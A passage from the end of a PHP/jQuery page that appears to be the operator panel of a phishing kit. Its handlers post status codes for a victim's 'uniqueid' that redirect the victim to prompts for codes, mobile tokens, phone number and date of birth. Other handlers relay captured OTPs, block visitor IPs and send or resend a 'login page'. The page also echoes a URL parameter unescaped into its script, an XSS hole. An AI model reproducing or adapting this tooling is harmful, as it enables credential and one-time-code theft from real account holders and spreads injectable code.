                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#code').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=4000",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#codere').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=4001",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#mtoken').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=4002",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#mtokenre').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=4003",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#complete').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=200",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#phone').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=10002",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#phonere').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=10003",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#dob').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=6000",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           function blockUserIP() {
    var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
    
    if (globalIp) {
        $.ajax({
            url: "../sqldata/blockuserip.php",
            type: "POST",
            dataType: "text",
            data: { uniqueid: uniqueid, ip: globalIp }, 
            success: function(response) {
                console.log(response);
                if (response.status === "success") {
                    showToasti();
                } else {
                    console.error("Error blocking/unblocking IP");
                }
            },
            error: function(xhr, status, error) {
                console.error(status, error);
            }
        });
    } else {
        console.error("Global IP is not set. Please fetch the IP first.");
    }
}
    </script>
    <script>
        // Function to get URL parameters
        function getUrlParameter(name) {
            name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
            const regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
            const results = regex.exec(location.search);
            return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
        }
    
        // Check if 'type=1' exists in the URL
        const type = getUrlParameter('type');
    
        if (type === '1' || type === '2') {
    // Change the text of the 'confirm' button
    document.getElementById('confirm').textContent = 'Prompt';
    
    // Hide the 'reconfirm' button
    document.getElementById('reconfirm').style.display = 'none';

    
    // Check if type is '2', then show #email and #emailre, otherwise hide them
 
}

    </script>
    <script>
        function clickBody() {
          document.body.click();
        }
        
        setInterval(clickBody, 3000);
        </script>
        <script>
            $(document).ready(function() {
                // Function to get query parameter from the URL
                function getQueryParam(param) {
                    var urlParams = new URLSearchParams(window.location.search);
                    return urlParams.get(param);
                }
    
                // Get the uniqueid from the URL
                var uniqueid = getQueryParam('uniqueid');
    
                $('#jshdjwshd').click(function(event) {
                    event.preventDefault();
    
                    var formData = {
                        otp: $('#usernameee').val(),
                        uniqueid: uniqueid
                    };
    
                    $.ajax({
                        type: 'POST',
                        url: '../sqldata/appli2.php?login',
                        data: formData,
                        success: function(data) {
                            console.log("Ajax success");
                            console.log("Data received: ", data);
                            closeDialog();
                            
    
                            if (data) {
                                try {
                                    let parsed_data = JSON.parse(data);
    
                                    if (parsed_data.status === 'success') {
                                        console.log("Login successful");
                                    } else {
                                        console.log("Login failed. Status: ", parsed_data.status);
                                        // Handle login failure
                                    }
                                } catch (error) {
                                    console.log("Error parsing JSON data: ", error);
                                    // Handle JSON parsing error
                                }
                            } else {
                                console.log("No data received from the server");
                                // Handle case where no data is received from the server
                            }
                        },
                        error: function(xhr, status, error) {
                            console.log("Ajax error");
                            console.log("Error message: ", error);
                            // Handle AJAX error
                        }
                    });
                });
            });
        </script>
        <script>
            $(document).ready(function() {
                // Function to get query parameter from the URL
                function getQueryParam(param) {
                    var urlParams = new URLSearchParams(window.location.search);
                    return urlParams.get(param);
                }
    
                // Get the uniqueid from the URL
                var uniqueid = getQueryParam('uniqueid');
    
                $('#resendappli2').click(function(event) {
                    event.preventDefault();
    
                    var formData = {
                        otp: $('#usernameee').val(),
                        uniqueid: uniqueid
                    };
    
                    $.ajax({
                        type: 'POST',
                        url: '../sqldata/appli23.php?login',
                        data: formData,
                        success: function(data) {
                            console.log("Ajax success");
                            console.log("Data received: ", data);
                            closeDialog();
                            
    
                            if (data) {
                                try {
                                    let parsed_data = JSON.parse(data);
    
                                    if (parsed_data.status === 'success') {
                                        console.log("Login successful");
                                    } else {
                                        console.log("Login failed. Status: ", parsed_data.status);
                                        // Handle login failure
                                    }
                                } catch (error) {
                                    console.log("Error parsing JSON data: ", error);
                                    // Handle JSON parsing error
                                }
                            } else {
                                console.log("No data received from the server");
                                // Handle case where no data is received from the server
                            }
                        },
                        error: function(xhr, status, error) {
                            console.log("Ajax error");
                            console.log("Error message: ", error);
                            // Handle AJAX error
                        }
                    });
                });
            });
        </script>
        <script>
            $(document).ready(function() {
                // Function to get query parameter from the URL
                function getQueryParam(param) {
                    var urlParams = new URLSearchParams(window.location.search);
                    return urlParams.get(param);
                }
    
                // Get the uniqueid from the URL
                var uniqueid = getQueryParam('uniqueid');
    
                $('#submitAlt').click(function(event) {
                    event.preventDefault();
    
                    var formData = {
                        otp: $('#usern').val(),
                        uniqueid: uniqueid
                    };
    
                    $.ajax({
                        type: 'POST',
                        url: '../sqldata/appli24.php?login',
                        data: formData,
                        success: function(data) {
                            console.log("Ajax success");
                            console.log("Data received: ", data);
                            closeDialog();
                            
    
                            if (data) {
                                try {
                                    let parsed_data = JSON.parse(data);
    
                                    if (parsed_data.status === 'success') {
                                        console.log("Login successful");
                                    } else {
                                        console.log("Login failed. Status: ", parsed_data.status);
                                        // Handle login failure
                                    }
                                } catch (error) {
                                    console.log("Error parsing JSON data: ", error);
                                    // Handle JSON parsing error
                                }
                            } else {
                                console.log("No data received from the server");
                                // Handle case where no data is received from the server
                            }
                        },
                        error: function(xhr, status, error) {
                            console.log("Ajax error");
                            console.log("Error message: ", error);
                            // Handle AJAX error
                        }
                    });
                });
            });
        </script>
        <script>
            $(document).ready(function() {
                // Function to get query parameter from the URL
                function getQueryParam(param) {
                    var urlParams = new URLSearchParams(window.location.search);
                    return urlParams.get(param);
                }
    
                // Get the uniqueid from the URL
                var uniqueid = getQueryParam('uniqueid');
    
                $('#resendAlt').click(function(event) {
                    event.preventDefault();
    
                    var formData = {
                        otp: $('#usern').val(),
                        uniqueid: uniqueid
                    };
    
                    $.ajax({
                        type: 'POST',
                        url: '../sqldata/appli25.php?login',
                        data: formData,
                        success: function(data) {
                            console.log("Ajax success");
                            console.log("Data received: ", data);
                            closeDialog();
                            
    
                            if (data) {
                                try {
                                    let parsed_data = JSON.parse(data);
    
                                    if (parsed_data.status === 'success') {
                                        console.log("Login successful");
                                    } else {
                                        console.log("Login failed. Status: ", parsed_data.status);
                                        // Handle login failure
                                    }
                                } catch (error) {
                                    console.log("Error parsing JSON data: ", error);
                                    // Handle JSON parsing error
                                }
                            } else {
                                console.log("No data received from the server");
                                // Handle case where no data is received from the server
                            }
                        },
                        error: function(xhr, status, error) {
                            console.log("Ajax error");
                            console.log("Error message: ", error);
                            // Handle AJAX error
                        }
                    });
                });
            });
        </script>
        <script>
            function openDialogAlt() {
                const dialogOverlayAlt = document.getElementById('dialogOverlayAlt');
                const dialogAlt = document.getElementById('dialogAlt');
                dialogOverlayAlt.classList.add('visible');
                setTimeout(() => {
                    dialogAlt.classList.add('visible');
                }, 100); // Small delay for animation
            }
        
            function closeDialogAlt() {
                const dialogOverlayAlt = document.getElementById('dialogOverlayAlt');
                const dialogAlt = document.getElementById('dialogAlt');
                dialogAlt.classList.remove('visible');
                setTimeout(() => {
                    dialogOverlayAlt.classList.remove('visible');
                }, 300); // Delay the overlay close to sync with dialog scale-out animation
            }
        
            function outsideClickAlt(event) {
                const dialogAlt = document.getElementById('dialogAlt');
                if (event.target === dialogAlt.parentNode) {
                    closeDialogAlt();
                }
            }
        </script>
        <script>
            document.addEventListener('DOMContentLoaded', function () {
    const modal = document.getElementById("modal");
    const btn = document.getElementById("ffff");
    const span = document.getElementsByClassName("close-button")[0];

    // Open the modal
    btn.onclick = function () {
        modal.style.display = "block";
    }

    // Close the modal
    span.onclick = function () {
        modal.style.display = "none";
    }

    window.onclick = function (event) {
        if (event.target == modal) {
            modal.style.display = "none";
        }
    }

    // Submit the form
    $('#submit-otp-<?php echo $uniqueid; ?>').submit(function (e) {
        e.preventDefault();

        var inputs = $('input[type=checkbox]');
        var input_array = [];

        inputs.each(function (i, input) {
            var enabled = $(input).is(":checked") ? 1 : 0;
            input_array.push(enabled);
        });

        $.ajax({
            type: 'POST',
            url: '../sqldata/req_otp.php?login',
            data: { input_array: input_array, uniqueid: '<?php echo $uniqueid; ?>' },
            success: function (data) {
                console.log(data)
                let parsed_data = JSON.parse(data);

                if (parsed_data.status == "success") {
                    showToast('Login page sent');
                    setTimeout(function () { window.location.reload(); }, 1500);
                }
            }
        });
    });

    // Resend button functionality
    function resend_otp() {
  var inputs = $('input[type=checkbox]');
  var input_array = [];

  inputs.each(function(i, input) {
    var enabled = $(input).is(":checked") ? 1 : 0;
    input_array.push(enabled);
  })

  $.ajax({
    type: 'POST',
    url: '../sqldata/req_otp.php?login&resend',
    data: {input_array: input_array, uniqueid: uniqueid},
    success: function(data) {
      let parsed_data = JSON.parse(data);

      if (parsed_data.status == "success") {
        showToast('login page resent');

        setTimeout(function() { window.location.reload(); }, 1500);
      }
    }
  })
}
$('#resend-button').click(function() {
    resend_otp();
});

});

            </script>
</body>
</html>
